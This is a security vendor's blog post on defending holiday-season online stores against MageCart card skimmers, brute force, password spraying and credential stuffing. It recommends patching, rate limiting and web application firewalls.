During the holiday shopping season, online businesses are counting on a spike in online traffic. Web advertising is in place, new products have been posted, and shopping carts are ready for an influx of returning customers and new shoppers. What they may not be ready for is the number of cybercriminals staking out their online stores looking for ways to intercept customer transactions, spread malware, and access databases filled with customer data.
Which means that in addition to its being time to warm up the wassail and hang the mistletoe, it’s also time for organizations to review how they’re securing their Web storefront.
This past year we have seen a steady increase in online crime. The cybercrime consortium known as MageCart, for example, has been very active over the past year loading credit card skimmers onto web sites. This past summer, for example, FortiGuard Labs researchers detailed a MageCart campaign that managed to exploit vulnerable websites to plant skimmer malware, enabling the campaign to steal data from over 185,000 payment cards in a one year operation.
Protecting your website from a digital skimmer requires three things. First, your website code needs to be tested to ensure that it is not vulnerable to attacks that allow skimming software to be injected into your site. Second, you need a tool like a web application firewall (WAF) that can monitor and prevent injection attacks. And finally, you can use your WAF to monitor outbound traffic to detect and block traffic returning to the cybercriminals’ command and control (C&C or C2) server.
Passwords are often another weak link in any security strategy, and cybercriminals primarily use three tactics to breach a customer’s account looking for financial information or a vulnerable link back into the internal database.
These attack strategies are:
Brute Force attacks, which are the oldest of all password attack methods. In this strategy, criminals test multiple passwords, often from a modified dictionary or other source, against a single account hoping the account owner used an easy-to-guess password. Algorithms allow password cracker software to combine words, add common replacements (a zero for a the letter O, a 3 for an E, etc.), and use combinations of personal data gleaned from the dark web or social media sites, such as the names of your family or pets, the towns you grew up in, the schools you attended, your school mascots, and your graduation dates and birthday, etc.
Password Spraying is very similar, except rather than using multiple password attempts against a single account, hackers use common passwords against a large number of accounts looking for that one weak link. This attack exploits a common flaw in password software that either allows an attacker to target multiple accounts simultaneously using usernames pulled off the dark web or other sources. It’s similar to ringing every doorbell in an apartment building on the chance that someone will buzz you in.
Preventing both of these sorts of attacks is fairly straightforward. The most important thing is to ensure that your password access control software provides basic security functions. No one should be able to try and access multiple accounts simultaneously, or be allowed to fail an attempt to enter a password more than a handful of times. The most common responses are to either force a user to reset their password after a minimum number of failed attempts, or by requiring a user to solve a CAPTCHA when a login attempt looks suspicious. However, CAPTCHAs are not perfect, and a number of tools exist, such as deathbycaptcha, 2captcha, and Puppeteer, that can be used to break them with a reasonably high success rate.
Once again, the WAF is your friend. It not only detects attempts to brute force or password spray a website, but can also tell when multiple accounts are being accessed from a common location or set of locations, or of website traffic coming from a suspicious server. In those and similar cases, it can not only lock the account, it can block the offending origination server from being able to continue to knock on the door.
The third strategy, Credential Stuffing, is a little more complicated. It uses a two-step process. First, it accesses the literally billions of stolen accounts and passwords available on the dark web and collects known username and password pairs, known as combolists. It then counts on users to make a very common – and very dangerous – mistake: they reuse their username and password on multiple accounts. Hackers then simply use their combolists to attempt to login to the targeted website by using dev tools like selenium, puppeteer, cURL, or phantom to run combolists against a login URL.
What do cybercriminals do with these compromised accounts? Some may attempt to misuse them right away. Once in, they can change the email address to prevent notifications, order merchandise using the account owner’s stored credit card or banking information, or steal other information such as addresses and visible pieces of credit card, bank account, or social security numbers.
But popped accounts have another value. They can be sold on the dark web for anything between a couple of bucks to up to $100. Accounts with things like miles. Bonus points, or especially, gaming gear such as skins are especially valuable, as are those that can transfer points or money because they can be used for money laundering.
Web owners want to do two things here. The first is, you do not want to create a credential spill by having your database compromised. That starts by ensuring that your website and shopping cart are updated and patched. Second, is, you guessed it, install a WAF.
Credential stuffing defense built into WAF solutions identify login attempts that leverage compromised combolists using an up-to-date feed of stolen credentials. Administrators can configure the WAF to then take actions if a suspicious login is used, including logging the event, sending an alert, and blocking the login attempt.
Of course, we’ve barely scratched the surface of all the way your online store can be compromised. But a web application firewall can defend against all of them, along with the entire list of web vulnerabilities listed on the OWASP Top Ten and other common vulnerabilities and attack strategies. WAF solutions use a comprehensive approach for protecting Web applications, including IP reputation, DDoS protection, protocol validation, application attack signatures, bot mitigation, injection prevention, tampering detection, and more. Advanced WAF solutions also leverage machine learning to automatically build and maintain a model of normal user behavior to identify both benign and malicious application traffic without time-consuming manual application learning.
So as your website works through the crush of holiday shopping, don’t wait to unwrap a shiny new Web Application Firewall for your organization.
Learn more about how FortiGuard Labs provides unmatched security and intelligence services using integrated AI systems. Find out about the FortiGuard Security Services portfolio and sign up for our weekly FortiGuard Threat Brief.
Read about the FortiGuard Security Rating Service, which provides security audits and best practices to guide customers in designing, implementing, and maintaining the security posture best suited for their organization.